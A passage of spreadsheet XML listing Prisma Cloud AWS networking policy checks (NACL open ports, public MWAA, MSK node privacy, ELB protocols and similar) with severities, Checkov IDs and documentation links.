          <t>build</t>
        </is>
      </c>
      <c r="Q1327" t="inlineStr"/>
      <c r="R1327" t="inlineStr"/>
      <c r="S1327" t="inlineStr"/>
      <c r="T1327" t="b">
        <v>0</v>
      </c>
      <c r="U1327" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1327" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-lb,aws-lb-listener</t>
        </is>
      </c>
      <c r="W1327" t="inlineStr">
        <is>
          <t>Ensure that ALB redirects HTTP requests into HTTPS ones</t>
        </is>
      </c>
      <c r="X1327" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-alb-redirects-http-requests-into-https-ones</t>
        </is>
      </c>
      <c r="Y1327" t="inlineStr"/>
      <c r="Z1327" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_lb","aws_lb_listener"]}</t>
        </is>
      </c>
      <c r="AA1327" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1327" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1327" t="inlineStr">
        <is>
          <t>CKV2_AWS_20</t>
        </is>
      </c>
      <c r="AD1327" t="b">
        <v>1</v>
      </c>
      <c r="AE1327" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1327" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>b7139473-a345-43f5-be2d-6d21681b359b</t>
        </is>
      </c>
      <c r="AI1327" t="inlineStr"/>
      <c r="AJ1327" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1327" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" t="inlineStr"/>
      <c r="B1328" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1328" s="2" t="inlineStr"/>
      <c r="D1328" t="inlineStr"/>
      <c r="E1328" t="inlineStr"/>
      <c r="F1328" t="inlineStr"/>
      <c r="G1328" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1328" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-load</t>
        </is>
      </c>
      <c r="K1328" t="inlineStr">
        <is>
          <t>AWS ELB Policy uses some unsecure protocols</t>
        </is>
      </c>
      <c r="L1328" t="inlineStr"/>
      <c r="M1328" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1328" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1328" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1328" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1328" t="inlineStr"/>
      <c r="R1328" t="inlineStr"/>
      <c r="S1328" t="inlineStr"/>
      <c r="T1328" t="b">
        <v>0</v>
      </c>
      <c r="U1328" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1328" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-load-balancer-policy</t>
        </is>
      </c>
      <c r="W1328" t="inlineStr">
        <is>
          <t>Ensure ELB Policy uses only secure protocols</t>
        </is>
      </c>
      <c r="X1328" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elb-policy-uses-only-secure-protocols</t>
        </is>
      </c>
      <c r="Y1328" t="inlineStr"/>
      <c r="Z1328" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_load_balancer_policy"]}</t>
        </is>
      </c>
      <c r="AA1328" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1328" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1328" t="inlineStr">
        <is>
          <t>CKV_AWS_213</t>
        </is>
      </c>
      <c r="AD1328" t="b">
        <v>1</v>
      </c>
      <c r="AE1328" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1328" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>b5c7b4ba-ca27-46a0-904e-ba0190361498</t>
        </is>
      </c>
      <c r="AI1328" t="inlineStr"/>
      <c r="AJ1328" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1328" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" t="inlineStr"/>
      <c r="B1329" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1329" s="2" t="inlineStr"/>
      <c r="D1329" t="inlineStr"/>
      <c r="E1329" t="inlineStr"/>
      <c r="F1329" t="inlineStr"/>
      <c r="G1329" t="b">
        <v>1</v>
      </c>
      <c r="H13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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1329" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-msk</t>
        </is>
      </c>
      <c r="K1329" t="inlineStr">
        <is>
          <t>MSK nodes are not private</t>
        </is>
      </c>
      <c r="L1329" t="inlineStr"/>
      <c r="M1329" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1329" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1329" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1329" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1329" t="inlineStr"/>
      <c r="R1329" t="inlineStr"/>
      <c r="S1329" t="inlineStr"/>
      <c r="T1329" t="b">
        <v>0</v>
      </c>
      <c r="U1329" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1329" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-msk-cluster</t>
        </is>
      </c>
      <c r="W1329" t="inlineStr">
        <is>
          <t>Ensure MSK nodes are private</t>
        </is>
      </c>
      <c r="X1329" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-291</t>
        </is>
      </c>
      <c r="Y1329" t="inlineStr"/>
      <c r="Z1329" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_msk_cluster"]}</t>
        </is>
      </c>
      <c r="AA1329" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1329" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1329" t="inlineStr">
        <is>
          <t>CKV_AWS_291</t>
        </is>
      </c>
      <c r="AD1329" t="b">
        <v>1</v>
      </c>
      <c r="AE1329" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1329" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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29" t="inlineStr">
        <is>
          <t>7fda58d8-b466-43ac-937f-207db1d5c3d2</t>
        </is>
      </c>
      <c r="AI1329" t="inlineStr"/>
      <c r="AJ1329" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1329" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" t="inlineStr"/>
      <c r="B1330" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1330" s="2" t="inlineStr"/>
      <c r="D1330" t="inlineStr"/>
      <c r="E1330" t="inlineStr"/>
      <c r="F1330" t="inlineStr"/>
      <c r="G1330" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1330" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-mwaa</t>
        </is>
      </c>
      <c r="K1330" t="inlineStr">
        <is>
          <t>MWAA environment is publicly accessible</t>
        </is>
      </c>
      <c r="L1330" t="inlineStr"/>
      <c r="M1330" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1330" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1330" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1330" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1330" t="inlineStr"/>
      <c r="R1330" t="inlineStr"/>
      <c r="S1330" t="inlineStr"/>
      <c r="T1330" t="b">
        <v>0</v>
      </c>
      <c r="U1330" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1330" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-mwaa-environment</t>
        </is>
      </c>
      <c r="W1330" t="inlineStr">
        <is>
          <t>Ensure MWAA environment is not publicly accessible</t>
        </is>
      </c>
      <c r="X1330" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-66</t>
        </is>
      </c>
      <c r="Y1330" t="inlineStr"/>
      <c r="Z1330" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_mwaa_environment"]}</t>
        </is>
      </c>
      <c r="AA1330" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1330" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1330" t="inlineStr">
        <is>
          <t>CKV2_AWS_66</t>
        </is>
      </c>
      <c r="AD1330" t="b">
        <v>1</v>
      </c>
      <c r="AE1330" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1330" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>369e3a34-26a8-4ac2-92ba-2b779349c877</t>
        </is>
      </c>
      <c r="AI1330" t="inlineStr"/>
      <c r="AJ1330" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1330" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" t="inlineStr"/>
      <c r="B1331" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1331" s="2" t="inlineStr"/>
      <c r="D1331" t="inlineStr"/>
      <c r="E1331" t="inlineStr"/>
      <c r="F1331" t="inlineStr"/>
      <c r="G1331" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1331" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network</t>
        </is>
      </c>
      <c r="K1331" t="inlineStr">
        <is>
          <t>NACL ingress allows all ports</t>
        </is>
      </c>
      <c r="L1331" t="inlineStr"/>
      <c r="M1331" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1331" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1331" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1331" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1331" t="inlineStr"/>
      <c r="R1331" t="inlineStr"/>
      <c r="S1331" t="inlineStr"/>
      <c r="T1331" t="b">
        <v>0</v>
      </c>
      <c r="U1331" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1331" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network-acl-rule</t>
        </is>
      </c>
      <c r="W1331" t="inlineStr">
        <is>
          <t>Ensure NACL ingress does not allow all Ports</t>
        </is>
      </c>
      <c r="X1331" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-352</t>
        </is>
      </c>
      <c r="Y1331" t="inlineStr"/>
      <c r="Z1331" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_network_acl_rule"]}</t>
        </is>
      </c>
      <c r="AA1331" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1331" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1331" t="inlineStr">
        <is>
          <t>CKV_AWS_352</t>
        </is>
      </c>
      <c r="AD1331" t="b">
        <v>1</v>
      </c>
      <c r="AE1331" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1331" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>1b05c45c-e978-49ce-a734-56512f1d5fff</t>
        </is>
      </c>
      <c r="AI1331" t="inlineStr"/>
      <c r="AJ1331" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1331" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" t="inlineStr"/>
      <c r="B1332" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1332" s="2" t="inlineStr"/>
      <c r="D1332" t="inlineStr"/>
      <c r="E1332" t="inlineStr"/>
      <c r="F1332" t="inlineStr"/>
      <c r="G1332" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1332" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network</t>
        </is>
      </c>
      <c r="K1332" t="inlineStr">
        <is>
          <t>AWS NACL allows ingress from 0.0.0.0/0 to port 20</t>
        </is>
      </c>
      <c r="L1332" t="inlineStr"/>
      <c r="M1332" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1332" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1332" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1332" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1332" t="inlineStr"/>
      <c r="R1332" t="inlineStr"/>
      <c r="S1332" t="inlineStr"/>
      <c r="T1332" t="b">
        <v>0</v>
      </c>
      <c r="U1332" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1332" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network-acl-rule,aws-network-acl</t>
        </is>
      </c>
      <c r="W1332" t="inlineStr">
        <is>
          <t>Ensure no NACL allow ingress from 0.0.0.0:0 to port 20</t>
        </is>
      </c>
      <c r="X1332" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20</t>
        </is>
      </c>
      <c r="Y1332" t="inlineStr"/>
      <c r="Z1332" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_network_acl_rule", "aws_network_acl"]}</t>
        </is>
      </c>
      <c r="AA1332" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1332" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1332" t="inlineStr">
        <is>
          <t>CKV_AWS_230</t>
        </is>
      </c>
      <c r="AD1332" t="b">
        <v>1</v>
      </c>
      <c r="AE1332" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1332" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>a4a20fce-f0a1-4d0a-abee-3330c572f77c</t>
        </is>
      </c>
      <c r="AI1332" t="inlineStr"/>
      <c r="AJ1332" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1332" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" t="inlineStr"/>
      <c r="B1333" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1333" s="2" t="inlineStr"/>
      <c r="D1333" t="inlineStr"/>
      <c r="E1333" t="inlineStr"/>
      <c r="F1333" t="inlineStr"/>
      <c r="G1333" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1333" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network</t>
        </is>
      </c>
      <c r="K1333" t="inlineStr">
        <is>
          <t>AWS NACL allows ingress from 0.0.0.0/0 to port 22</t>
        </is>
      </c>
      <c r="L1333" t="inlineStr"/>
      <c r="M1333" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1333" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1333" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1333" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1333" t="inlineStr"/>
      <c r="R1333" t="inlineStr"/>
      <c r="S1333" t="inlineStr"/>
      <c r="T1333" t="b">
        <v>0</v>
      </c>
      <c r="U1333" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1333" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network-acl-rule,aws-network-acl</t>
        </is>
      </c>
      <c r="W1333" t="inlineStr">
        <is>
          <t>Ensure no NACL allow ingress from 0.0.0.0:0 to port 22</t>
        </is>
      </c>
      <c r="X1333" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22</t>
        </is>
      </c>
      <c r="Y1333" t="inlineStr"/>
      <c r="Z1333" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_network_acl_rule", "aws_network_acl"]}</t>
        </is>
      </c>
      <c r="AA1333" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1333" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1333" t="inlineStr">
        <is>
          <t>CKV_AWS_232</t>
        </is>
      </c>
      <c r="AD1333" t="b">
        <v>1</v>
      </c>
      <c r="AE1333" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1333" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>a38287d8-f7b2-4d14-a06f-f4ef2467f472</t>
        </is>
      </c>
      <c r="AI1333" t="inlineStr"/>
      <c r="AJ1333" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1333" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" t="inlineStr"/>
      <c r="B1334" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1334" s="2" t="inlineStr"/>
      <c r="D1334" t="inlineStr"/>
      <c r="E1334" t="inlineStr"/>
      <c r="F1334" t="inlineStr"/>
      <c r="G1334" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1334" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network</t>
        </is>
      </c>
      <c r="K1334" t="inlineStr">
        <is>
          <t>AWS NACL allows ingress from 0.0.0.0/0 to port 3389</t>
        </is>
      </c>
      <c r="L1334" t="inlineStr"/>
      <c r="M1334" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1334" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1334" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1334" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1334" t="inlineStr"/>
      <c r="R1334" t="inlineStr"/>
      <c r="S1334" t="inlineStr"/>
      <c r="T1334" t="b">
        <v>0</v>
      </c>
      <c r="U1334" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1334" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network-acl-rule,aws-network-acl</t>
        </is>
      </c>
      <c r="W1334" t="inlineStr">
        <is>
          <t>Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389</t>
        </is>
      </c>
      <c r="X1334" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389</t>
        </is>
      </c>
      <c r="Y1334" t="inlineStr"/>
      <c r="Z1334" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_network_acl_rule", "aws_network_acl"]}</t>
        </is>
      </c>
      <c r="AA1334" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1334" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1334" t="inlineStr">
        <is>
          <t>CKV_AWS_231</t>
        </is>
      </c>
      <c r="AD1334" t="b">
        <v>1</v>
      </c>
      <c r="AE1334" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1334" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>207dd5fe-304c-4ee5-b238-3becd4f395c0</t>
        </is>
      </c>
      <c r="AI1334" t="inlineStr"/>
      <c r="AJ1334" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1334" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" t="inlineStr"/>
      <c r="B1335" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1335" s="2" t="inlineStr"/>
      <c r="D1335" t="inlineStr"/>
      <c r="E1335" t="inlineStr"/>
      <c r="F1335" t="inlineStr"/>
      <c r="G1335" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1335" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network</t>
        </is>
      </c>
      <c r="K1335" t="inlineStr">
        <is>
          <t>AWS NACL allows ingress from 0.0.0.0/0 to port 21</t>
        </is>
      </c>
      <c r="L1335" t="inlineStr"/>
      <c r="M1335" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1335" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1335" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1335" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1335" t="inlineStr"/>
      <c r="R1335" t="inlineStr"/>
      <c r="S1335" t="inlineStr"/>
      <c r="T1335" t="b">
        <v>0</v>
      </c>
      <c r="U1335" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1335" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-network-acl-rule,aws-network-acl</t>
        </is>
      </c>
      <c r="W1335" t="inlineStr">
        <is>
          <t>Ensure no NACL allow ingress from 0.0.0.0:0 to port 21</t>
        </is>
      </c>
      <c r="X1335" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21</t>
        </is>
      </c>
      <c r="Y1335" t="inlineStr"/>
      <c r="Z1335" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_network_acl_rule", "aws_network_acl"]}</t>
        </is>
      </c>
      <c r="AA1335" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1335" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1335" t="inlineStr">
        <is>
          <t>CKV_AWS_229</t>
        </is>
      </c>
      <c r="AD1335" t="b">
        <v>1</v>
      </c>
      <c r="AE1335" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1335" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>6aee688e-e769-41f9-aed0-cb2ae972c31c</t>
        </is>
      </c>
      <c r="AI1335" t="inlineStr"/>
      <c r="AJ1335" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1335" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" t="inlineStr"/>
      <c r="B1336" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1336" s="2" t="inlineStr"/>
      <c r="D1336" t="inlineStr"/>
      <c r="E1336" t="inlineStr"/>
      <c r="F1336" t="inlineStr"/>
      <c r="G1336" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1336" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-opensearch</t>
        </is>
      </c>
      <c r="K1336" t="inlineStr">
        <is>
          <t>AWS Elasticsearch uses the default security group</t>
        </is>
      </c>
      <c r="L1336" t="inlineStr"/>
      <c r="M1336" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1336" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1336" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1336" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1336" t="inlineStr"/>
      <c r="R1336" t="inlineStr"/>
      <c r="S1336" t="inlineStr"/>
      <c r="T1336" t="b">
        <v>0</v>
      </c>
      <c r="U1336" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1336" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-opensearch-domain,aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1336" t="inlineStr">
        <is>
          <t>Ensure that Elasticsearch is not using the default Security Group</t>
        </is>
      </c>
      <c r="X1336" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-elasticsearch-does-not-use-the-default-security-group</t>
        </is>
      </c>
      <c r="Y1336" t="inlineStr"/>
      <c r="Z1336" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_opensearch_domain", "aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA1336" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1336" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1336" t="inlineStr">
        <is>
          <t>CKV_AWS_248</t>
        </is>
      </c>
      <c r="AD1336" t="b">
        <v>1</v>
      </c>
      <c r="AE1336" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1336" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>61467e80-d0cd-44e8-ae43-c7b4877f771e</t>
        </is>
      </c>
      <c r="AI1336" t="inlineStr"/>
      <c r="AJ1336" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1336" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" t="inlineStr"/>
      <c r="B1337" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1337" s="2" t="inlineStr"/>
      <c r="D1337" t="inlineStr"/>
      <c r="E1337" t="inlineStr"/>
      <c r="F1337" t="inlineStr"/>
      <c r="G1337" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1337" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-redshift</t>
        </is>
      </c>
      <c r="K1337" t="inlineStr">
        <is>
          <t>Redshift is deployed outside of a VPC</t>
        </is>
      </c>
      <c r="L1337" t="inlineStr"/>
      <c r="M1337" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1337" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1337" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1337" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
